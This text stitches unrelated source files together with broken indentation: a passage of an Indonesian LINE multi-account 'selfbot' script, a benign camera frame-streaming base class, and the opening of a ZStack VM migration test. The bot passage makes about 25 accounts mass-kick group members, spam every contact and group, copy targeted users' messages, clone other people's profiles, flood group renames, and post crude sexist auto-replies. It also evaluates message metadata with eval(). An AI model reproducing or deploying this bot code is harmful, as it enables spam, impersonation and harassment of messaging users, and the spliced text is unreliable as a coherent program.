cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
            #------------ Leave Every Group ------
            elif msg.text in ["Bot moleh"]: # pull every bot out of all groups it is still stuck in
if msg.from_ in owner:
                gid = k20.getGroupIdsJoined()  # only the last of the original reassignments ever took effect
                for i in gid:
                    for bot in [ks, kc, ki, kk, k1, k2, k3, k4, k5, k6, k7, k8, k9,
                                k10, k11, k12, k13, k14, k15, k16, k17, k18, k19,
                                k20, cl]:
                        bot.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body ????Har Har??")
kk.sendText(msg.to,"Hai Every Body ????Har Har??")
kc.sendText(msg.to,"Hai Every Body ????Har Har??")
elif msg.text in ["nah","Nah"]:
ki.sendText(msg.to,"Kan")
kk.sendText(msg.to,"Kan")
kc.sendText(msg.to,"Kan")
            #-----------------------------------------------
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG ????double thumbs up??????Har Har??")
kk.sendText(msg.to,"PONG ????double thumbs up??????Har Har??")
kc.sendText(msg.to,"PONG ????double thumbs up??????Har Har??")
#-----------------------------------------------
            #-------------Roll-Call Function Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
kk.sendText(msg.to,"BERHITUNG MULAI SATU")
ki.sendText(msg.to,"DUA")
cl.sendText(msg.to,"TIGA")
kc.sendText(msg.to,"EMPAT")
ks.sendText(msg.to,"LIMA")
k1.sendText(msg.to,"ENAM")
k2.sendText(msg.to,"TUJUH")
k3.sendText(msg.to,"DELAPAN")
k4.sendText(msg.to,"SEMBILAN")
k5.sendText(msg.to,"SEPULUH")
k6.sendText(msg.to,"SEBELAS")
k7.sendText(msg.to,"DUA BELAS")
k8.sendText(msg.to,"TIGA BELAS")
k9.sendText(msg.to,"EMPAT BELAS")
k10.sendText(msg.to,"LIMA BELAS")
k11.sendText(msg.to,"ENAM BELAS")
k12.sendText(msg.to,"TUJUH BELAS")
k13.sendText(msg.to,"DELAPAN BELAS")
k14.sendText(msg.to,"SEMBILAN BELAS")
k15.sendText(msg.to,"DUA PULUH")
k16.sendText(msg.to,"DUA PULUH SATU")
k17.sendText(msg.to,"DUA PULUH DUA")
k18.sendText(msg.to,"DUA PULUH TIGA")
k19.sendText(msg.to,"DUA PULUH EMPAT")
k20.sendText(msg.to,"DUA PULUH LIMA")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[? ???+? ? ¥ûDÏ ? ?+??? ?]")
            #-------------Roll-Call Function End---------------------#
#==========================================
elif "Youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif "youtube " in msg.text.lower():
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
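            # yt() is assumed to be a YouTube-search helper defined elsewhere in
            # this script; both branches accept "youtube <query>" or
            # "youtube <n> <query>" to pick the n-th search result.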
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
k1.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
k1.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
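            # Mimic relay: plain text is echoed via sendText; stickers
            # (contentType 7) are answered with a fixed sticker (STKID 6 of
            # package 1) and contact cards (contentType 13) are forwarded as-is.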
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "?? "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#=======================================
elif msg.text in ["Backup","backup"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
ki.updateDisplayPicture(backup.pictureStatus)
kk.updateDisplayPicture(backup.pictureStatus)
kc.updateDisplayPicture(backup.pictureStatus)
ks.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateProfile(backup)
kk.updateProfile(backup)
kc.updateProfile(backup)
ks.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
ki.sendText(msg.to, "Refreshed.")
kk.sendText(msg.to, "Refreshed.")
kc.sendText(msg.to, "Refreshed.")
ks.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
ki.sendText(msg.to, str(e))
kk.sendText(msg.to, str(e))
kc.sendText(msg.to, str(e))
ks.sendText(msg.to, str(e))
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
ki.CloneContactProfile(target)
kk.CloneContactProfile(target)
kc.CloneContactProfile(target)
ks.CloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["Kembali awal"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
kk.updateDisplayPicture(backup.pictureStatus)
kk.updateProfile(backup)
kc.updateDisplayPicture(backup.pictureStatus)
kc.updateProfile(backup)
ks.updateDisplayPicture(backup.pictureStatus)
ks.updateProfile(backup)
cl.sendText(msg.to, "Backup Sukses")
except Exception as e:
cl.sendText(msg.to, str (e))
#--------------------------------------------------------
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
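            # "rejectall" declines every pending group invitation for the main bot
            # (cl) only; the helper bots' invites are left untouched.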
#--------------------------------------------------------
            #-------------Auto-Reply Function Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah ????questioning??")
            #-------------Auto-Reply Function End---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
            #-------------Speed-Test Function Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
            #-------------Speed-Test Function End---------------------#
            #-------------Ban-by-Contact Function Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
            #-------------Ban-by-Contact Function End------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u6b34b703cbc5fc83cd1e5b6832a05352'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"Itu Creator Kami Yang Manis Kalem ??\nSmule : @RK_WAHYU\nNama : ???+? ? ¥ûDÏ ? ?+???\nZodiak : Sagitarius")
            #-------------Chat Function ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami ??????.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
            #-------------Banlist Function Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
            #-------------Banlist Function End------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in owner:
                for bot in [cl, ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9,
                            k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]:
                    bot.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in Creator:
                if 'MENTION' in msg.contentMetadata.keys():
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
ki.kickoutFromGroup(msg.to,[mention['M']])
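            # "Boom" kick-by-tag: the MENTION metadata is parsed with
            # ast.literal_eval and every mentioned mid is kicked via the ki client.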
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
# if op.param1 in autocancel:
# OWN = "ua7fc5964d31f45ac75128fc2b8deb842","u406133ad4d3fbe50a2f4d51ea081d050","ua51ba06b0dd18c0bfe2cc6caa3458202","uc7f32bb28dc009916d40af87c9910ddc"
# if op.param2 in OWN:
# pass
# else:
# Inviter = op.param3.replace("",',')
# InviterX = Inviter.split(",")
# contact = cl.getContact(op.param2)
# cl.cancelGroupInvitation(op.param1,InviterX)
# ki.cancelGroupInvitation(op.param1,InviterX)
# kk.cancelGroupInvitation(op.param1,InviterX)
# ks.cancelGroupInvitation(op.param1,InviterX)
# kc.cancelGroupInvitation(op.param1,InviterX)
# ka.cancelGroupInvitation(op.param1,InviterX)
# cl.kickoutFromGroup(op.param1,[op.param2])
# ki.kickoutFromGroup(op.param1,[op.param2])
# kk.kickoutFromGroup(op.param1,[op.param2])
# ks.kickoutFromGroup(op.param1,[op.param2])
# kc.kickoutFromGroup(op.param1,[op.param2])
# ka.kickoutFromGroup(op.param1,[op.param2])
# wait["blacklist"][op.param2] = True
# f=codecs.open('st2__b.json','w','utf-8')
# json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
k6.kickoutFromGroup(op.param1,[op.param2])
k7.kickoutFromGroup(op.param1,[op.param2])
k8.kickoutFromGroup(op.param1,[op.param2])
k9.kickoutFromGroup(op.param1,[op.param2])
k10.kickoutFromGroup(op.param1,[op.param2])
k11.kickoutFromGroup(op.param1,[op.param2])
k12.kickoutFromGroup(op.param1,[op.param2])
k13.kickoutFromGroup(op.param1,[op.param2])
k14.kickoutFromGroup(op.param1,[op.param2])
k15.kickoutFromGroup(op.param1,[op.param2])
k16.kickoutFromGroup(op.param1,[op.param2])
k17.kickoutFromGroup(op.param1,[op.param2])
k18.kickoutFromGroup(op.param1,[op.param2])
k19.kickoutFromGroup(op.param1,[op.param2])
k20.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
# if op.type == 26:
# if "@"+cl.getProfile().displayName in msg.text:
# tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
# jawab = ("Jgn Tag Gw woyy!!\nlagi ngocok dulu...!!!","Berisik jgn tag Gw Koplak","Gw Sibuk, Gausah di Tag!!!","Ngapain tag neh,, kangen yah...!!!")
# jawaban = random.choice(jawab)
# cl.sendText(msg.to,jawaban)
elif "@"+cl.getProfile().displayName in msg.text:
try:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = ("Jgn Tag Si "+cl.getProfile().displayName+"Ta cipok luh..!!","Berisik jgn tag si "+cl.getProfile().displayName+" dia lagi asyik ngocok...!!!")
jawaban = random.choice(jawab)
random.choice(KAC).sendText(msg.to,jawaban)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
except:
pass
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
pass
except:
pass
#---------------------
# if op.type == 17:
# if op.param2 in Bots:
# return
# ginfo = cl.getGroup(op.param1)
# random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
# random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
# random.choice(KAC).sendText(op.param1, "?? Semoga Betah Kk ??\nNo Baper,No nakal,No Ngeyel ya,No Bulshit")
# print "MEMBER HAS JOIN THE GROUP"
# if op.type == 15:
# if op.param2 in Bots:
# return
# random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v\nBelum di Anu Kayanya ??")
# print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
# if 'MENTION' in mid or Amid or Bmid or Cmid or Dmid or Emid or Fmid or Gmid or Hmid or Imid:
# cl.sendtext(msg.to,'[Auto Respon]\nngapain tag, pc langsung aja...!!!')
# pass
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
    # Return False when the current minute is a multiple of 10.
    now2 = datetime.now()
    nowT = datetime.strftime(now2,"%M")
    if nowT in ["10","20","30","40","50","00"]:
        return False
    else:
        return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
post = hasil['result']['posts'][zx]
target_mid = post['userInfo']['mid']
post_id = post['postInfo']['postId']
autolike_msg = "Autolike by Yudi Bot\n»»» http://line.me/ti/p/yudi_std02 «««"
cl.like(target_mid, post_id, likeType=1001)
cl.comment(target_mid, post_id, autolike_msg)
for bot in [ki, kk, kc, ks, k1, k2, k3]:
    bot.like(target_mid, post_id, likeType=1001)
    bot.comment(target_mid, post_id, "I follow my Boss, so I liked your status too\n\n Like back please ??")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
post = hasil['result']['posts'][zx]
target_mid = post['userInfo']['mid']
post_id = post['postInfo']['postId']
autolike_msg = "Autolike by Yudi Bot\n»»» http://line.me/ti/p/yudi_std02 «««"
for bot in [cl, ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]:
    bot.like(target_mid, post_id, likeType=1002)
for bot in [cl, ki, kk, kc, ks, k1, k2, k3]:
    bot.comment(target_mid, post_id, autolike_msg)
print "Like"
except:
pass
else:
print "Status Sudah di Like Boss"
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
# Append the current time to each bot's base name (nowT was previously
# computed but never used, which defeated the clock feature).
for bot, key in [(cl, "cName"), (ki, "cName2"), (kk, "cName3"), (kc, "cName4"), (ks, "cName5")]:
    profile = bot.getProfile()
    profile.displayName = wait[key] + nowT
    bot.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
base_camera.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].is_set():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@classmethod
def frames(cls):
    """Generator that returns frames from the camera."""
    raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
# if time.time() - BaseCamera.last_access > 10:
# frames_iterator.close()
# print('Stopping camera thread due to inactivity.')
# break
BaseCamera.thread = None
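# --- Editor's usage sketch (not part of the original module) ---
# A minimal, hypothetical subclass showing how frames() is meant to be
# implemented: a generator that yields raw frame bytes forever. A real
# camera class would yield encoded JPEG data instead.
class FakeCamera(BaseCamera):
    @staticmethod
    def frames():
        count = 0
        while True:
            time.sleep(0.1)  # simulate the camera's frame interval
            count += 1
            yield b'fake frame %d' % count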
|
test_migrate_stopped_vm_snapshots_progress.py
|
'''
New Integration test for testing stopped vm migration between hosts.
@author: quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.volume_operations as vol_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import apibinding.inventory as inventory
import threading
import time
import uuid
threads_num = 1
vms = [None] * threads_num
threads = [None] * threads_num
migrate_jobs = [None] * threads_num
